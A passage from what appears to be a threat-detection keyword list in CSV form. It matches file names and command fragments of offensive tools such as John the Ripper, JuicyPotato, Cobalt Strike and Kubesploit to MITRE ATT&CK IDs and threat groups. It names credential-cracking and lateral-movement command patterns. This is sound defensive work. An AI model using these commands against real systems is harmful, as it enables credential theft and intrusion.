T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*JoelGMSec/EvilnoVNC*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,1,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*JoelGMSec/PSRansom*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,1,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*Joey is the best hacker in Hackers*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*john * --incremental*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john * -w=*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john * --wordlist=*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-groups*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *htdigest*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-inc *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-incremental *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-shells*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-show*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-single*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-users*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *-wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john *--wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --format=*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*john hashes*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john NTDS.dit*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --show *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --status*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*John the Ripper*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john --wordlist=*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*John*the*Ripper*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john.bash_completion*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john.session.log*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john.zsh_completion*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john/password.lst*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*john/run/fuzz.dic*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john/src/ztex/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john@moozle.wtf*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*john_crack_asrep*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*john_crack_kerberoast*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*john_log_format*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john_mpi.c*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*john_register_all*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*JohnTheRipper *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*JohnTheRipper/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*joomscan -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*joomscan*,offensive_tool_keyword,joomscan,Joomla Vulnerability Scanner.,T1210.001 - T1190 - T1046 - T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web Attacks,https://github.com/rezasp/joomscan,1,0,N/A,N/A,10,950,250,2022-03-19T13:40:03Z,2016-09-01T09:06:17Z -*Jormungandr.cpp*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*Jormungandr.exe*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*Jormungandr-master*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*JPCERTCC*,offensive_tool_keyword,Github Username,github repo name containing multiple tools for log exploitation,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/JPCERTCC,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*jpgljfpmoofbmlieejglhonfofmahini*,greyware_tool_keyword,Free Residential VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jpillora/chisel*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*jplnlifepflhkbkgonidnobkakhmpnmh*,greyware_tool_keyword,Private Internet Access,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*jquery-c2.*.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*js-cracker-client/cracker.js*,offensive_tool_keyword,weakpass,Weakpass collection of tools for bruteforce and hashcracking,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/zzzteph/weakpass,1,1,N/A,10,3,293,36,2023-03-17T22:45:29Z,2021-08-29T13:07:37Z -*JScriptStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*jtee43gt-6543-2iur-9422-83r5w27hgzaq*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*juicycreds_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*JuicyPotato.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*JuicyPotato.exe*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*JuicyPotato.sln*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*JuicyPotato.vcxproj*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*juicypotato.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*juicypotato.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*juicypotato_reflective.dll*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*JuicyPotatoNG.cpp*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*JuicyPotatoNG.exe*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*JuicyPotatoNG.sln*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*JuicyPotatoNG.txt*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*JuicyPotatoNG-main*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*jump psexec_psh*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*jump psexec64*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*jump winrm *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*jump winrm*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 